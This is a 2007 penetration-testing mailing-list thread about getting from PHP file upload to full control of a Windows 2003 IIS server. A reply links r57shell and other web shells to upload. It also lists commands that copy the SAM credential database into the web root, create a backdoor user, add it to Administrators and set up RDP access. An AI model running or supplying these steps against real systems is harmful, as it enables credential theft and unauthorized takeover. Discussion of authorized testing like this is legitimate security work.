First of all, thanks all for your excellent help, and answering
DokFLeed.. yes, it is a authorized client to whom i am testing his PHP
APP.
But unfortunately the PHP APP dont have Zend Optimizer installed and
the other one (r57shell) is for Unix-like OS and i need a Windows
shell.
Finally and the most important thing, remember i dont have privilege
to run system commands because of IUSR_MACHINE user privileges
(Windows IIS-6 PHP-5), so i cant execute PHP Commands like system,
proc_open, passthru, exec, etc, so even though r57shell would have
being used, its based of aforementioned commands so it also would have
failed.
By now, i am able to connect to my machine through PHP Socket from PHP
APP Host (Client), but i think i need to bypass cmd.exe execution
(privilege scalation, etc) in order to really own the machine or to
assure there is no way to break into the client machine through its
PHP APP.
Thanks in Advance.
On Nov 25, 2007 7:12 AM, DokFLeed <dokfleed@dokfleed.net> wrote:
I assume its for the good cause, and you are authorized to do so ?!
Upload this to the server
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
encoded for Zend Optimizer
Or
http://no.spam.ee/~tonu/phpshell/r57shell.txt
Try the following commands:
=====================
1) To see whats running on system
tasklist -SVC
2) To get a copy of the sam database
copy C:\windows\repair\sam C:\www\sam.txt
http://hostname/sam.txt
3) To add new user with username tested123 & password tested123
net user tested123 tested123 /add /active:yes /expires:never
/passwordchg:yes /passwordreq:yes
4) To make him Administrator
net localgroup Administrators tested123 /add
5) Try to RDP to the server , if it is Firewalled!!
Download the RDP web front "Remote Desktop Connection Web Connection
Software (455 KB)"
Start IIS http://hostname /TSweb/
and log to Localhost
remember while testing, your imagination is your limitation:),
depending on your phpinfo output none of this might work, so you will have
to code around it
Dok
Smoke Dope, Eat Soap, Fly Home in a Bubble
==================
----- Original Message -----
From: "Danux" <danuxx@gmail.com>
To: <pen-test@securityfocus.com>
Sent: Friday, November 23, 2007 6:29 AM
Subject: PHP Exploitation
Hi experts, i need your ideas,
By now, i am able to upload php files to a Windows 2003 Server, so i
can execute php code like phpinfo, but i cant execute passthru command
because of lack of IUSR_MACHINE privileges.
I have run some local php bof's without success.
Do you have another idea to break into the server through php code
uploaded?
Cheers!!!!!
--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
